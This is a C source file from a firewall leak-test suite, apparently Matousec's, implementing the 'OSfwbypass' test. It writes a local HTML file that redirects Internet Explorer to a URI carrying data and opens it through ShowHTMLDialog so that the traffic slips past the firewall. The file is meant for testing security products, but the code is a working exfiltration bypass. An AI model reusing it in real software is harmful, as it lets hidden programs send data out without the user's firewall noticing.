/*

 Security Software Testing Suite - OSfwbypass (leak-test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * Based on the original idea and code of OSfwbypass-demo, written by Debasis Mohanty, http://www.hackingspirits.com/.


 Method description:

   * Internet Explorer must be running.

   * Create URL moniker for ShowHTMLDialog function as documented in MSDN: http://msdn2.microsoft.com/en-us/library/aa741858.aspx,
     but instead of Internet URL, use local .html file that redirects browser to the target URL,
     which contains the data to transfer.

*/

#include <windows.h>
#include <stdio.h>
#include <objidl.h>
#include "include/common.h"
#include "include/common-leak.h"
#include "include/common-hook.h"

typedef HRESULT WINAPI (*CREATE_URL_MONIKER)(IMoniker *pmkContext,LPWSTR szURL,IMoniker **ppmk);
typedef HRESULT WINAPI (*SHOW_HTML_DIALOG)(HWND hwndParent,IMoniker *pMk,VARIANT *pvarArgIn,WCHAR *pchOptions,VARIANT *pvarArgOut);


int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
  COM_CONF conf;
  if (!com_console_init_winmain("OSfwbypass","osfwbypass",lpCmdLine,&conf,COM_TEST_TYPE_OSFWBYPASS)) return 1;

  char *used_dlls[]={"ole32.dll","oleaut32.dll","mshtml.dll","urlmon.dll"};
  if (!com_hook_load_libraries(used_dlls,4)) return 1;

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  DWORD pid;
  if (com_get_ie_pid_wait(&pid,&err_inf))
  {
    char path[MAX_PATH];
    if (com_get_module_path(NULL,path,sizeof(path),&err_inf))
    {
      HMODULE urlmon_mod=LoadLibrary("urlmon.dll");
      if (urlmon_mod)
      {
        CREATE_URL_MONIKER CreateURLMoniker=(CREATE_URL_MONIKER)GetProcAddress(urlmon_mod,"CreateURLMoniker");
        if (CreateURLMoniker)
        {
          if (com_verbosity_get()) printf("CreateURLMoniker found in \"urlmon.dll\" at 0x%p\n",CreateURLMoniker);

          HMODULE mshtml_mod=LoadLibrary("mshtml.dll");
          if (mshtml_mod)
          {
            SHOW_HTML_DIALOG ShowHTMLDialog=(SHOW_HTML_DIALOG)GetProcAddress(mshtml_mod,"ShowHTMLDialog");
            if (ShowHTMLDialog)
            {
              if (com_verbosity_get()) printf("ShowHTMLDialog found in \"mshtml.dll\" at 0x%p\n",ShowHTMLDialog);

              wchar_t wfile[MAX_PATH];
              snwprintf(wfile,sizeof(wfile)/sizeof(wchar_t),L"%S\\osfwbypass.html",path);
              wfile[sizeof(wfile)/sizeof(wchar_t)-1]=L'\0';

              int file_ready=FALSE;
              HANDLE file=CreateFileW(wfile,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
              if (file!=INVALID_HANDLE_VALUE)
              {
                if (com_verbosity_get()) printf("File \"%S\" created.\n",wfile);

                char data[COM_INET_URI_MAX_LEN+256];
                snprintf(data,sizeof(data),"<html><head><title></title><script language='JavaScript'>"
                                           "window.location.href='%s'</script></head><body>CLOSE ME</body></html>",conf.uri);
                data[sizeof(data)-1]='\0';

                DWORD written;
                if (WriteFile(file,data,strlen(data),&written,NULL))
                {
                  if (com_verbosity_get()) printf("Data written to file \"%S\".\n",wfile);
                  file_ready=TRUE;
                } else com_err_set(&err_inf,"Unable to write data to file \"%S\".\n",wfile);

                CloseHandle(file);
              } else com_err_set(&err_inf,"Unable to create file \"%S\".\n",wfile);

              if (file_ready)
              {
                BSTR burl=SysAllocString(wfile);
                if (burl)
                {
                  IMoniker *moniker;
                  HRESULT hres=CreateURLMoniker(NULL,burl,&moniker);
                  if (SUCCEEDED(hres))
                  {
                    if (com_verbosity_get()) printf("URL moniker for file \"%S\" created.\n",wfile);

                    if (com_verbosity_get()) printf("Creating HTML dialog, close it if it appears.\n\n");

                    hres=ShowHTMLDialog(NULL,moniker,NULL,NULL,NULL);
                    if (SUCCEEDED(hres))
                    {
                      char buffer[4096];
                      res=com_attempt_check_ie_cache(buffer,sizeof(buffer),&conf,10000,&err_inf)
                       && com_find_pattern_and_print_data(buffer,sizeof(buffer),&conf,&err_inf);

                    } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to show HTML dialog.\n");

                    moniker->Release();
                  } else com_err_set_sc(&err_inf,HRESULT_CODE(hres),"Unable to create URL moniker for \"%s\".\n",conf.uri);

                  SysFreeString(burl);
                } else com_err_set_nc(&err_inf,"Unable to allocate BSTR string for \"%s\".\n",conf.uri);

                DeleteFileW(wfile);
              }
            } else com_err_set(&err_inf,"Unable to get address of \"ShowHTMLDialog\" in \"mshtml.dll\".\n");
          } else com_err_set(&err_inf,"Unable to load library \"mshtml.dll\".\n");

        } else com_err_set(&err_inf,"Unable to get address of \"CreateURLMoniker\" in \"urlmon.dll\".\n");
      } else com_err_set(&err_inf,"Unable to load library \"urlmon.dll\".\n");
    }
  }

  return com_end(res,&err_inf,&conf);
}
